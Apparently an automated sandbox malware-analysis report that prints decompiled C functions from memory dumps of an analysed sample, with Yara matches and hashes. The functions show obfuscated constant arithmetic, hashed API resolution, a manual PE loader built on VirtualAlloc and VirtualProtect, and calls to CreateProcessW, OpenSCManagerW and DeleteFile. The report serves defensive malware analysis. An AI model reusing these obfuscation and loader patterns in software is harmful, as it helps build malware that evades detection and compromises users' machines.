Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateProcess
String ID: @p
API String ID: 963392458-2609516012
Opcode ID: d31ca1205623dc1cdc77aa9fcf8a92b76c26a84db24defd749b4b1a88d353f87
Instruction ID: a7c9b370ed299ff1c294f8dab1b589114cc62936bb6d5d4daf4b3b2771d30285
Opcode Fuzzy Hash: d31ca1205623dc1cdc77aa9fcf8a92b76c26a84db24defd749b4b1a88d353f87
Instruction Fuzzy Hash: A2911472500248EFDF59CF61C98A8CE3BA1FF44348F509119FE16961A0D3BAD999CF84

Uniqueness

Uniqueness Score: -1.00%

Function 0024C0C6, Relevance: 1.4, Strings: 1, Instructions: 124
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0024C0C6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v592;
				void* _t141;
				void* _t159;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t141);
				_v64 = _v64 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v72 = 0x2e7eef;
				_v68 = 0x12a0e3;
				_v36 = 0x822d;
				_v36 = _v36 ^ 0x7542ca13;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00755fa2;
				_v48 = 0xc0ea;
				_t161 = 0x4d;
				_v48 = _v48 * 0x52;
				_v48 = _v48 + 0x53ba;
				_v48 = _v48 ^ 0x003e0539;
				_v8 = 0xf2be;
				_v8 = _v8 ^ 0xca92c6dd;
				_v8 = _v8 | 0xdeb53509;
				_v8 = _v8 + 0x330e;
				_v8 = _v8 ^ 0xdeb75724;
				_v28 = 0xbc60;
				_v28 = _v28 * 3;
				_v28 = _v28 ^ 0x088be546;
				_v28 = _v28 ^ 0x0889fb38;
				_v20 = 0x79be;
				_v20 = _v20 / _t161;
				_t162 = 0x2f;
				_v20 = _v20 * 0x21;
				_v20 = _v20 / _t162;
				_v20 = _v20 ^ 0x000058f8;
				_v12 = 0x6f12;
				_v12 = _v12 + 0x2ef8;
				_v12 = _v12 ^ 0xc4c69b2c;
				_t163 = 0x19;
				_v12 = _v12 / _t163;
				_v12 = _v12 ^ 0x07dec8f1;
				_v16 = 0x233d;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0xb86ca57e;
				_v16 = _v16 ^ 0x25a63868;
				_v16 = _v16 ^ 0x9dca839c;
				_v44 = 0x9c92;
				_v44 = _v44 ^ 0x484225af;
				_v44 = _v44 << 0xa;
				_v44 = _v44 ^ 0x0ae4f7f7;
				_v56 = 0xf3a1;
				_v56 = _v56 + 0xffff3be5;
				_v56 = _v56 ^ 0x00000dea;
				_v24 = 0xe687;
				_v24 = _v24 ^ 0x2fa59812;
				_v24 = _v24 | 0x8a70baf8;
				_v24 = _v24 << 0xe;
				_v24 = _v24 ^ 0x7fbf04b5;
				_v40 = 0x7d0b;
				_v40 = _v40 + 0xffffa14c;
				_v40 = _v40 + 0x5747;
				_v40 = _v40 ^ 0x000069af;
				_v32 = 0xbccf;
				_v32 = _v32 << 0xb;
				_v32 = _v32 + 0xa312;
				_v32 = _v32 ^ 0x05e7304f;
				_v52 = 0xd186;
				_v52 = _v52 << 7;
				_t164 = 0xc;
				_v52 = _v52 / _t164;
				_v52 = _v52 ^ 0x0008a17f;
				_push(_v48);
				E00257BAF(_v52,  &_v592, _v28, _a4, _v20, _v12, E0025889D(0x25c050, _v36, _v52));
				E00252025(_v16, _t154, _v44, _v56);
				_t159 = E0025AA3C(_v24, _v40, _v32, _v52,  &_v592); // executed
				return _t159;
			}

0x0024c0d0
0x0024c0d3
0x0024c0d6
0x0024c0d9
0x0024c0da
0x0024c0db
0x0024c0e0
0x0024c0e6
0x0024c0ea
0x0024c0f1
0x0024c0f8
0x0024c0ff
0x0024c106
0x0024c10a
0x0024c111
0x0024c11e
0x0024c121
0x0024c124
0x0024c12b
0x0024c132
0x0024c139
0x0024c140
0x0024c147
0x0024c14e
0x0024c155
0x0024c160
0x0024c163
0x0024c16a
0x0024c171
0x0024c17f
0x0024c186
0x0024c189
0x0024c193
0x0024c196
0x0024c19d
0x0024c1a4
0x0024c1ab
0x0024c1b5
0x0024c1b8
0x0024c1bb
0x0024c1c2
0x0024c1c9
0x0024c1cd
0x0024c1d4
0x0024c1db
0x0024c1e2
0x0024c1e9
0x0024c1f0
0x0024c1f4
0x0024c1fb
0x0024c202
0x0024c209
0x0024c210
0x0024c217
0x0024c21e
0x0024c225
0x0024c229
0x0024c230
0x0024c237
0x0024c23e
0x0024c245
0x0024c24c
0x0024c253
0x0024c257
0x0024c25e
0x0024c265
0x0024c26e
0x0024c277
0x0024c27f
0x0024c282
0x0024c289
0x0024c2ad
0x0024c2bd
0x0024c2d5
0x0024c2e1

Strings

~., xrefs: 0024C0EA

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteFile
String ID: ~.
API String ID: 4033686569-2304494891
Opcode ID: 4343a9435147478e74ce7afdd0b613f85e033f675f0708b7522caa75e5a97c89
Instruction ID: cce4518cfa50083d3d43a57838b9f91d0ec7fba05e74837db071d473830f9337
Opcode Fuzzy Hash: 4343a9435147478e74ce7afdd0b613f85e033f675f0708b7522caa75e5a97c89
Instruction Fuzzy Hash: A8511471C1121DEBDF48DFE5D94A8EEBBB2FB04304F208159E511B62A0D7B91A58CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00248736, Relevance: .1, Instructions: 56
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00248736(long __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t64;
				signed int _t66;
				signed int _t67;
				signed int _t68;
				long _t77;

				_v16 = 0x5e27;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 + 0xcb06;
				_v16 = _v16 + 0xffffffa0;
				_v16 = _v16 ^ 0x0000caae;
				_v20 = 0x53d5;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0x29eaafbc;
				_v12 = 0x2701;
				_t77 = __ecx;
				_t66 = 0x3f;
				_v12 = _v12 * 0x75;
				_v12 = _v12 / _t66;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x0000510c;
				_v24 = 0xb555;
				_v24 = _v24 | 0xad821aca;
				_v24 = _v24 ^ 0xad82f196;
				_v8 = 0x411b;
				_t67 = 0x67;
				_v8 = _v8 / _t67;
				_t68 = 0x1c;
				_v8 = _v8 / _t68;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x00005eaa;
				_t64 = E0025981E(_t77, E0024C506(_t68), _v16, _v12, _v24, _v8); // executed
				return _t64;
			}

0x0024873c
0x00248745
0x00248749
0x00248750
0x00248754
0x0024875b
0x00248762
0x00248766
0x0024876d
0x0024877b
0x0024877d
0x0024877e
0x00248788
0x0024878d
0x00248791
0x00248798
0x0024879f
0x002487a6
0x002487ad
0x002487b7
0x002487bc
0x002487c4
0x002487c7
0x002487ca
0x002487ce
0x002487ed
0x002487f9

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 143c34c34cbd3b33341801c7d9cc665edc253c7b9165565ce924f81eb71ba2ac
Instruction ID: 3cabf6e536b780d2c320fdb8f44ef632b9517bf614f2dbe9d4c3fbe834f8ede8
Opcode Fuzzy Hash: 143c34c34cbd3b33341801c7d9cc665edc253c7b9165565ce924f81eb71ba2ac
Instruction Fuzzy Hash: A0215371D00209EFEF08DFA9D94A4DEBBB2EB44304F208199E415B7294E7B51B64DF81

Uniqueness

Uniqueness Score: -1.00%

Function 00242959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00242959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0024602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002507A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0024295f
0x00242964
0x00242967
0x0024296a
0x0024296d
0x0024296e
0x0024296f
0x00242977
0x00242985
0x0024298a
0x00242992
0x0024299a
0x002429a2
0x002429a9
0x002429b0
0x002429b7
0x002429bb
0x002429cf
0x002429dc
0x002429e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002429DC

Strings

<^, xrefs: 00242977

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 3e6d1b5a01cd0fdcda24aea55cf6fa34e580be4e139d8afb2a8803ff8af63732
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: 8A016D72A00108BFEB18DF95DC4A8DFBFB6EF49310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0024C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0024C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0024602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002507A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0024c6e1
0x0024c6e6
0x0024c6f0
0x0024c6fc
0x0024c703
0x0024c706
0x0024c70d
0x0024c711
0x0024c715
0x0024c71c
0x0024c723
0x0024c72a
0x0024c731
0x0024c738
0x0024c751
0x0024c762
0x0024c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0024C762

Strings

/O, xrefs: 0024C6E6

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 3c7cf0de1f5ed7469e7890f97129af1cec401de26ed1d109ba8ab5eb06557b8d
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: DD1133B290122DBBCB25DF95DC498EFBFB8EF05714F108188F90966210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00241000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00241000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0024602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002507A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00241006
0x00241009
0x0024100c
0x00241011
0x00241016
0x0024101d
0x00241026
0x0024102d
0x00241034
0x0024103b
0x00241047
0x0024104f
0x00241057
0x0024105e
0x00241065
0x0024106c
0x00241073
0x00241077
0x0024108b
0x00241096
0x0024109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00241096

Strings

[, xrefs: 0024103B

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 7a9518ee9f9445a9ea81d9c3fdb50e1bc1c45783eafac264d9cd089ecdcddc20
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: 27015BB6D01308BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B689B91

Uniqueness

Uniqueness Score: -1.00%

Function 00244859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00244859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002507A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0024485e
0x0024487a
0x0024487d
0x00244884
0x0024488b
0x00244892
0x0024489d
0x002448a0
0x002448ad
0x002448b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 002448B7

Strings

[, xrefs: 0024488B

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: eea1a5535cbed8a1fb8469f8cc00cf66a99779d49ea18802af489eead00461e1
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 9CF017B0A15209FBDB04CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F549B54

Uniqueness

Uniqueness Score: -1.00%

Function 10001780, Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E10001780(intOrPtr* _a4, long _a8) {
				long _t31;
				signed int _t32;
				intOrPtr* _t37;
				void* _t47;
				void** _t48;
				signed int _t52;
				signed int _t55;
				long _t56;

				_t48 = _a8;
				_t56 = _t48[2];
				if(_t56 != 0) {
					_t52 = _t48[3];
					if((_t52 & 0x02000000) == 0) {
						_t31 =  *(0x10012080 + ((_t52 >> 0x1f) + ((_t52 >> 0x0000001e & 0x00000001) + (_t52 >> 0x0000001d & 0x00000001) * 2) * 2) * 4);
						if((_t52 & 0x04000000) != 0) {
							_t31 = _t31 | 0x00000200;
						}
						_t32 = VirtualProtect( *_t48, _t56, _t31,  &_a8); // executed
						asm("sbb eax, eax");
						return  ~( ~_t32);
					} else {
						_t47 =  *_t48;
						if(_t47 == _t48[1]) {
							if(_t48[4] != 0) {
								L7:
								VirtualFree(_t47, _t56, 0x4000); // executed
							} else {
								_t37 = _a4;
								_t55 =  *(_t37 + 0x30);
								if( *((intOrPtr*)( *_t37 + 0x38)) == _t55 || _t56 % _t55 == 0) {
									goto L7;
								}
							}
						}
						return 1;
					}
				} else {
					return _t56 + 1;
				}
			}

0x10001783
0x10001787
0x1000178c
0x10001797
0x100017a0
0x100017f9
0x10001806
0x10001808
0x10001808
0x10001815
0x1000181d
0x10001824
0x100017a2
0x100017a2
0x100017a7
0x100017ad
0x100017c6
0x100017cd
0x100017af
0x100017af
0x100017b2
0x100017ba
0x00000000
0x00000000
0x100017ba
0x100017ad
0x100017db
0x100017db
0x1000178e
0x10001793
0x10001793

APIs

VirtualFree.KERNELBASE(?,?,00004000,00000000,100013CB,?,1000195F,100013CB,?,00000000,00000000,00000000), ref: 100017CD

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 0a855d0dde1407c1c92472205702e4fda3e9c4e53b097d130a35f6ebea364484
Instruction ID: f401046966946d9f8f8c45c464924eb5d72016bba8cd02ac906e1c8dccc1d15e
Opcode Fuzzy Hash: 0a855d0dde1407c1c92472205702e4fda3e9c4e53b097d130a35f6ebea364484
Instruction Fuzzy Hash: EB11BF327101198BE304DE09E880F9AB3BAFF947A0F46825AF509CB295DB30E951C790

Uniqueness

Uniqueness Score: -1.00%

Function 00254F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00254F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0024602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002507A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00254f80
0x00254f81
0x00254f82
0x00254f86
0x00254f87
0x00254f8c
0x00254fa5
0x00254fa8
0x00254faf
0x00254fb6
0x00254fc7
0x00254fca
0x00254fd7
0x00254fe2
0x00254fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00254FE2

Strings

{#lm, xrefs: 00254FC2

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 06239dc362f97eaa70eb23fd74c1e17bb42c55f8652e937dc061d02bd2fd5417
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 03F037B081120CFFDB08DFA4D98689EBFBAEB44300F208199E804AB250D3715B549B55

Uniqueness

Uniqueness Score: -1.00%

Function 10001620, Relevance: 2.6, APIs: 2, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E10001620(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _t30;
				signed int _t31;
				void* _t38;
				void* _t49;
				void* _t51;
				intOrPtr _t53;
				signed int _t54;
				intOrPtr _t55;
				long _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t65;
				long _t66;
				intOrPtr _t68;
				void* _t70;
				void* _t72;
				void* _t75;
				long* _t77;
				void* _t78;

				_t30 = _a16;
				_t55 =  *_t30;
				_t68 =  *((intOrPtr*)(_t30 + 4));
				_t31 =  *(_t55 + 0x14) & 0x0000ffff;
				_v8 = _t68;
				_v12 = 0;
				if(0 >=  *((intOrPtr*)(_t55 + 6))) {
					L15:
					return 1;
				} else {
					_t65 = VirtualAlloc;
					_t7 = _t55 + 0x28; // 0x28
					_t77 = _t7 + _t31;
					do {
						_t56 =  *_t77;
						if(_t56 != 0) {
							if(_a8 < _t77[1] + _t56) {
								SetLastError(0xd);
								goto L17;
							} else {
								_t38 = VirtualAlloc( *((intOrPtr*)(_t77 - 4)) + _t68, _t56, 0x1000, 4); // executed
								if(_t38 == 0) {
									goto L17;
								} else {
									_t66 =  *_t77;
									_t51 =  *((intOrPtr*)(_t77 - 4)) + _t68;
									_t70 = _t77[1] + _a4;
									if(_t66 != 0) {
										_t49 = _t51;
										_t75 = _t70 - _t51;
										do {
											 *_t49 =  *((intOrPtr*)(_t75 + _t49));
											_t49 = _t49 + 1;
											_t66 = _t66 - 1;
										} while (_t66 != 0);
									}
									 *(_t77 - 8) = _t51;
									goto L13;
								}
							}
						} else {
							_t54 =  *(_a12 + 0x38);
							if(_t54 <= 0) {
								goto L14;
							} else {
								_push(4);
								_push(0x1000);
								_push(_t54);
								_push( *((intOrPtr*)(_t77 - 4)) + _t68);
								if( *_t65() == 0) {
									L17:
									return 0;
								} else {
									_t72 =  *((intOrPtr*)(_t77 - 4)) + _v8;
									 *(_t77 - 8) = _t72;
									if(_t54 != 0) {
										_t58 = _t54;
										_t59 = _t58 >> 2;
										memset(_t72 + _t59, memset(_t72, 0, _t59 << 2), (_t58 & 0x00000003) << 0);
										_t78 = _t78 + 0x18;
									}
									L13:
									_t68 = _v8;
									_t65 = VirtualAlloc;
									goto L14;
								}
							}
						}
						goto L18;
						L14:
						_t53 = _v12 + 1;
						_t77 =  &(_t77[0xa]);
						_v12 = _t53;
					} while (_t53 < ( *( *_a16 + 6) & 0x0000ffff));
					goto L15;
				}
				L18:
			}

0x10001626
0x1000162a
0x1000162e
0x10001631
0x10001637
0x1000163a
0x10001645
0x1000170a
0x10001713
0x1000164b
0x1000164b
0x10001651
0x10001654
0x10001656
0x10001656
0x1000165a
0x100016ab
0x10001718
0x00000000
0x100016ad
0x100016bb
0x100016bf
0x00000000
0x100016c1
0x100016c4
0x100016c6
0x100016cb
0x100016d0
0x100016d2
0x100016d4
0x100016d6
0x100016d9
0x100016db
0x100016de
0x100016de
0x100016d6
0x100016e1
0x00000000
0x100016e1
0x100016bf
0x1000165c
0x1000165f
0x10001664
0x00000000
0x1000166a
0x1000166d
0x1000166f
0x10001674
0x10001677
0x1000167c
0x10001720
0x10001726
0x10001682
0x10001685
0x10001688
0x1000168d
0x1000168f
0x10001693
0x1000169f
0x1000169f
0x1000169f
0x100016e4
0x100016e4
0x100016e7
0x00000000
0x100016e7
0x1000167c
0x10001664
0x00000000
0x100016ed
0x100016f5
0x100016fa
0x100016fd
0x10001700
0x00000000
0x10001656
0x00000000

APIs

VirtualAlloc.KERNELBASE(?,00000000,00001000,00000004,00000000,00000000,100013CB), ref: 100016BB
SetLastError.KERNEL32(0000000D,00000000,00000000,100013CB), ref: 10001718

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocErrorLastVirtual
String ID:
API String ID: 497505419-0
Opcode ID: 499873566bbd645cff9e59e7a492908ec14657ec9cd407e7c376ee034dda42c6
Instruction ID: fad9ae3e34d1be210c33c3a39cf181ee10ee9e26815f97c4518dfa0af5a2346d
Opcode Fuzzy Hash: 499873566bbd645cff9e59e7a492908ec14657ec9cd407e7c376ee034dda42c6
Instruction Fuzzy Hash: C3318F757002459BEB10CF59DC80B9AF7E5EF88380F298569E948DB349D672EC51CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0025976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0025976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002507A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00259772
0x00259773
0x00259778
0x0025977a
0x0025977b
0x0025977e
0x0025977f
0x00259782
0x00259785
0x00259788
0x00259789
0x0025978c
0x0025978f
0x00259790
0x00259791
0x00259794
0x00259797
0x0025979a
0x0025979d
0x002597a0
0x002597a3
0x002597a6
0x002597a7
0x002597a8
0x002597ad
0x002597b7
0x002597c3
0x002597ca
0x002597d1
0x002597d8
0x002597df
0x002597e3
0x002597fc
0x00259816
0x0025981d

APIs

CreateProcessW.KERNEL32(0024591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0024591A), ref: 00259816

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 1e14ee12d85c589b7e607ebae06fa3d48f7016d811bdd3277a2a5c3a4f5dd12d
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
